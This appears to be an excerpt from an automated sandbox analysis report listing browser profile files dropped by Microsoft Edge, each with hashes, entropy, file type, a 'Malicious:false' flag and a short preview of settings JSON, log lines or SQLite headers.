                                                                                                                                                                                                                                                                                              Entropy (8bit):5.111866745329898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stykdwJsF+paFvrE9kbMpH8DbV+FyHQArpUc+PdYJ:stypsFKCDBbG+Q3cl
                                                                                                                                                                                                                                                                                              MD5:8B5540DD2E56E5AD20A9F7BBA2654A67
                                                                                                                                                                                                                                                                                              SHA1:0EBED21CD567C43546865B3ECF5EEA7FC9A8833F
                                                                                                                                                                                                                                                                                              SHA-256:EC15383E1FF48ED3051D4256292136310E8A79A246E7D936B98CC2E44A8DEBEE
                                                                                                                                                                                                                                                                                              SHA-512:4A3A89A4BF64368EF6594EA15DDCC005DCED13B1CB829562C5846512E3509C5A653D4493C8F436E56E9CB70C733906DCF30EEF004623E029CC2B22AD04284AB1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377248544811538","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":853,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565554180248527
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:1R+UXCWZ4W5wRhff4sf8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPlRIkZosrwXeIp4p:1cuCW4WaRhff9fu1jakv2Furtf
                                                                                                                                                                                                                                                                                              MD5:E75FBE00A11F47ACAAA26041BA3D82E8
                                                                                                                                                                                                                                                                                              SHA1:BE10ADDE1A9639C324265EB0DD8BDBCF11118E76
                                                                                                                                                                                                                                                                                              SHA-256:A87620245CE8C1C2F23B2B970609191B693561F996C12564D3455EED08318E00
                                                                                                                                                                                                                                                                                              SHA-512:9486B57162A0E40F6E74EAE319D45FF8B545D0710C96555B92D01F04135113464D4529D019A91615F0761A864D0830FF1553F1E7FFD084A44806B9E8EABFF69C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377248544032094","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377248544032094","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):24853
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.565554180248527
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:1R+UXCWZ4W5wRhff4sf8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPlRIkZosrwXeIp4p:1cuCW4WaRhff9fu1jakv2Furtf
                                                                                                                                                                                                                                                                                              MD5:E75FBE00A11F47ACAAA26041BA3D82E8
                                                                                                                                                                                                                                                                                              SHA1:BE10ADDE1A9639C324265EB0DD8BDBCF11118E76
                                                                                                                                                                                                                                                                                              SHA-256:A87620245CE8C1C2F23B2B970609191B693561F996C12564D3455EED08318E00
                                                                                                                                                                                                                                                                                              SHA-512:9486B57162A0E40F6E74EAE319D45FF8B545D0710C96555B92D01F04135113464D4529D019A91615F0761A864D0830FF1553F1E7FFD084A44806B9E8EABFF69C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377248544032094","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377248544032094","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):337
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.05883258871224
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:S85aEFljljljljlQtllaV933M76H1TpdUA5EEEE:S+a8ljljljljlQtlcFVVH
                                                                                                                                                                                                                                                                                              MD5:95D8CAE754E7CAAAB32B449E30A48E40
                                                                                                                                                                                                                                                                                              SHA1:F5E90D00DB41D92A12E77ABD55F25BF674781151
                                                                                                                                                                                                                                                                                              SHA-256:5488EF56CE985F8AA6B8CD0AB570787AC3420347CA64B59AE97B9FABEC9CCF82
                                                                                                                                                                                                                                                                                              SHA-512:FD5FF8A335B3D84E7BB568B054CB013B409817F3A2334A5A107A6E589CD4430C08D19B3BBAAA64D4454D64C13753355F05298EC4BF708D45E89EA29C5EE0544A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............+;..b................next-map-id.1.Cnamespace-d3c24314_32d8_4066_b164_db89f9568945-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................V.e................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116746652105613
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKUDHMq2PN723oH+TcwtrQMxIFUt8YKZZmw+YKW/FzkwON723oH+TcwtrQMFLJ:jMvVaYebCFUt8r/+oN5OaYebtJ
                                                                                                                                                                                                                                                                                              MD5:28F6336D3D33D3315CAAD12BF549B022
                                                                                                                                                                                                                                                                                              SHA1:7B0C6118DCD5EA3EEF41B29E0937714C3091ED6C
                                                                                                                                                                                                                                                                                              SHA-256:BB8EDB8564F74B5261852D937C0DB4CCF71960BA337CD119CFF6E108C695C3A9
                                                                                                                                                                                                                                                                                              SHA-512:BDB9A4C036A834FE72472382EAFA9CC7999C77EAF29D308D9344147B374103772E981BF661074057CF2F42981AF3A9F0956F55F8FA314F03E67A89D305506A87
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.162 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/28-01:22:25.297 1eb4 Recovering log #3.2024/11/28-01:22:25.328 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.116746652105613
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:HKUDHMq2PN723oH+TcwtrQMxIFUt8YKZZmw+YKW/FzkwON723oH+TcwtrQMFLJ:jMvVaYebCFUt8r/+oN5OaYebtJ
                                                                                                                                                                                                                                                                                              MD5:28F6336D3D33D3315CAAD12BF549B022
                                                                                                                                                                                                                                                                                              SHA1:7B0C6118DCD5EA3EEF41B29E0937714C3091ED6C
                                                                                                                                                                                                                                                                                              SHA-256:BB8EDB8564F74B5261852D937C0DB4CCF71960BA337CD119CFF6E108C695C3A9
                                                                                                                                                                                                                                                                                              SHA-512:BDB9A4C036A834FE72472382EAFA9CC7999C77EAF29D308D9344147B374103772E981BF661074057CF2F42981AF3A9F0956F55F8FA314F03E67A89D305506A87
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.162 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/28-01:22:25.297 1eb4 Recovering log #3.2024/11/28-01:22:25.328 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1389
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8268062174306237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:3GNJ8rAPJCpsAF4unxOHtLp3X2amEtG1ChqIxTiQKkOAM4yv7:3G/NPJCzF+NLp2FEkChLxHOpTv7
                                                                                                                                                                                                                                                                                              MD5:EB0EB1AE1A61611C11047DC800FB13CB
                                                                                                                                                                                                                                                                                              SHA1:3F273101E9D444CBCABBBFF7685BF5F25748A542
                                                                                                                                                                                                                                                                                              SHA-256:A32A975E2BE2F03B58E6504D72CCE7D05C330DD9CFE3FC7A2B153DC80C7DF391
                                                                                                                                                                                                                                                                                              SHA-512:35574E7C0DFEAEBC484F838CA75E8BFF4FBA49D1C0180B702B066A41BF3D46F1333A44B6159E1D5195B4E398AA1B09342CA56504D54B00B682B4BB530D8917D7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SNSS........t.,............t.,......".t.,............t.,........t.,........t.,........t.,....!...t.,................................t.,.t.,1..,....t.,$...d3c24314_32d8_4066_b164_db89f9568945....t.,........t.,...............t.,5..0....t.,&...{46F3A197-DB49-410A-81B3-94975C835573}......t.,...........t.,............t.,........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........LM..'...LM..'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...d.2.5.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.023862947468219
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:H6Q+9+q2PN723oH+Tcwt7Uh2ghZIFUt8Y602WZmw+Y609VkwON723oH+Tcwt7Uh9:w9+vVaYebIhHh2FUt8aJ/+a9V5OaYebs
                                                                                                                                                                                                                                                                                              MD5:B6AAF08A7481B8E9B8485A51DB8E267B
                                                                                                                                                                                                                                                                                              SHA1:CC04BB0A09EA58023D00E0FC9CA032C3EF7F0583
                                                                                                                                                                                                                                                                                              SHA-256:5F6998AF9DD814E9D09E9E9488A31E8DFB9D8CA71FCF82ED4C6107380DDE95E7
                                                                                                                                                                                                                                                                                              SHA-512:5ED0D39426285D4FE378BFE8651A67B0EA87A9278DEA3655FEAB61CE08513E77539FC4E053417CDB86AF49A18166546B7F4F83E6A1D81F2C73704F96D376133C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.213 1e0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/28-01:22:24.214 1e0c Recovering log #3.2024/11/28-01:22:24.214 1e0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.023862947468219
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:H6Q+9+q2PN723oH+Tcwt7Uh2ghZIFUt8Y602WZmw+Y609VkwON723oH+Tcwt7Uh9:w9+vVaYebIhHh2FUt8aJ/+a9V5OaYebs
                                                                                                                                                                                                                                                                                              MD5:B6AAF08A7481B8E9B8485A51DB8E267B
                                                                                                                                                                                                                                                                                              SHA1:CC04BB0A09EA58023D00E0FC9CA032C3EF7F0583
                                                                                                                                                                                                                                                                                              SHA-256:5F6998AF9DD814E9D09E9E9488A31E8DFB9D8CA71FCF82ED4C6107380DDE95E7
                                                                                                                                                                                                                                                                                              SHA-512:5ED0D39426285D4FE378BFE8651A67B0EA87A9278DEA3655FEAB61CE08513E77539FC4E053417CDB86AF49A18166546B7F4F83E6A1D81F2C73704F96D376133C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:24.213 1e0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/28-01:22:24.214 1e0c Recovering log #3.2024/11/28-01:22:24.214 1e0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zEXlxJ:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:B534FD10FF648291B2D6FB9936848384
                                                                                                                                                                                                                                                                                              SHA1:7A26590BF035509F87AF8D8CA116E1A1BC399DD7
                                                                                                                                                                                                                                                                                              SHA-256:69C3F175C6B2D4BBDE8465AF8CE83D5A5703FE4DF4A59BCB35F2ADC9BFB0F0C1
                                                                                                                                                                                                                                                                                              SHA-512:2DAB8E51A6F22A5A25B371496DD6F257BA5803D87AC60D04859408C44DE7658D2FED15545751EDA55CD516939928EF861A742F3E06CBED09DF9E4BB9637B37C9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.185537082973332
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:lkN+vVaYebvqBQFUt8ou/+HNV5OaYebvqBvJ:66VaYebvZg8oXlOaYebvk
                                                                                                                                                                                                                                                                                              MD5:885B422C1B47C7EDF1A311C5A0792003
                                                                                                                                                                                                                                                                                              SHA1:EE5D52B7260A36DC8ACAD9E8F003234769E3B162
                                                                                                                                                                                                                                                                                              SHA-256:8AD06C827774DCD5CE3EB03DC49E4AC8F4311ECAFEFF3480B3464A9D7C3B373E
                                                                                                                                                                                                                                                                                              SHA-512:01F90092A5055DA046C7D7477CDB249EAE1DA233C8E41FF751CB53389B0517BD3573C2E3BC4BFF2E230AFD3BFCD8B08BF545EA6DBDF35C444B5CB957BBD09AF8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.284 1f0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/28-01:22:25.325 1f0c Recovering log #3.2024/11/28-01:22:25.604 1f0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.185537082973332
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:lkN+vVaYebvqBQFUt8ou/+HNV5OaYebvqBvJ:66VaYebvZg8oXlOaYebvk
                                                                                                                                                                                                                                                                                              MD5:885B422C1B47C7EDF1A311C5A0792003
                                                                                                                                                                                                                                                                                              SHA1:EE5D52B7260A36DC8ACAD9E8F003234769E3B162
                                                                                                                                                                                                                                                                                              SHA-256:8AD06C827774DCD5CE3EB03DC49E4AC8F4311ECAFEFF3480B3464A9D7C3B373E
                                                                                                                                                                                                                                                                                              SHA-512:01F90092A5055DA046C7D7477CDB249EAE1DA233C8E41FF751CB53389B0517BD3573C2E3BC4BFF2E230AFD3BFCD8B08BF545EA6DBDF35C444B5CB957BBD09AF8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/11/28-01:22:25.284 1f0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/28-01:22:25.325 1f0c Recovering log #3.2024/11/28-01:22:25.604 1f0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:[]
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                              MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                              SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                              SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                              SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
